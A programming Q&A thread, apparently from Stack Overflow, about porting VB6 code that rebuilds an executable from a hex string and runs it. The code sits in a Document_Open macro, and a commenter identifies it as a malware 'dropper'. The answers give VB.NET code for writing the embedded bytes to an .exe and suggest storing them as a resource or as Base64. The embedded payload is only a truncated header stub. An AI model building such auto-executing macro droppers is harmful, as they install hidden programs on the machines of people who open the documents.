# convert from hex code to exe file in vb.net

Tags: vb.net, vb6, hex, binaryfiles, code-translation

I have this code in **vb6** that can create an exe file from its hex code. I want to do the same in **vb.net**.

**This is my vb6 code:**

```
Public Sub Document_Open()

    Dim str As String
    Dim hex As String

    hex = hex & "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00" 
    hex = hex & "40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

    'you have to put the full hex code of the application here

    Dim exe As String
    Dim i As Long
    Dim puffer As Long

    i = 1

    Do
        str = Mid(hex, i, 2)

        'convert hex to decimal
        puffer = Val("&H" & str)

        'convert decimal to ASCII
        exe = exe & Chr(puffer)

        i = i + 2

        If i >= Len(hex) - 2 Then
            Exit Do
        End If
    Loop

    'write to file
    Open "C:\application.exe" For Append As #2
    Print #2, exe
    Close #2

    'and run the exe
    Dim pid As Integer
    pid = Shell("C:\application.exe", vbNormalFocus)

End Sub
```

Comment: This kind of malware is called a "dropper."

Comment: it is not a malware just an idea comes to me i did it in vb6 and try to do it in vb.net

Comment: It isn't a legitimate technique and has no value.

Comment: but it still a good code to study for noobs like me.if you can help me re-write it in vb.net

Comment: How far have you gotten on vb.net?  What can you show us?

Comment: It would be easier if it was a byte array literal instead of a string, but why not just store it as a resource and then, at run-time, just write the resource out to a file?

Comment: i'm newbie in vb.net for that i need your help

Comment: Good idea Stive. i will try it. i want to run my application as service after creating it from its hex code.can i do it if i store it as resource?????

Comment: How you store the binary data, and how you launch it once it's written to a file, are two completely different and unrelated things.  The one has no bearing on the other.

Answer (score 0):

It would be easier if the data was defined as a byte array literal, like this:

```
Dim bytes() As Byte = {&H4D, &H5A, &H50,
                       &H0, &H2, &H0} ' etc...
File.WriteAllBytes("c:\application.exe", bytes)
```

However, it would be nicer to store the binary data in a resource, then just write the resource out to a file, like this:

```
File.WriteAllBytes("c:\application.exe", My.Resources.Application_exe)
```

If you really need to convert it from a hexadecimal string, you could do it like this:

```
Dim hex As String = "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00" &
                    "40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Using fs As New FileStream("c:\application.exe", FileMode.Create, FileAccess.Write)
    For Each byteHex As String In hex.Split()
        fs.WriteByte(Convert.ToByte(byteHex, 16))
    Next
End Using
```

Comment: Dim bytes() as byte it will take a big string

Comment: Are you asking me how you could do it with a string instead of a byte array literal?  I don't know what you mean by your comment.

Comment: You could also store the data in the application as Base64 encoded strings, the overhead will be minimal.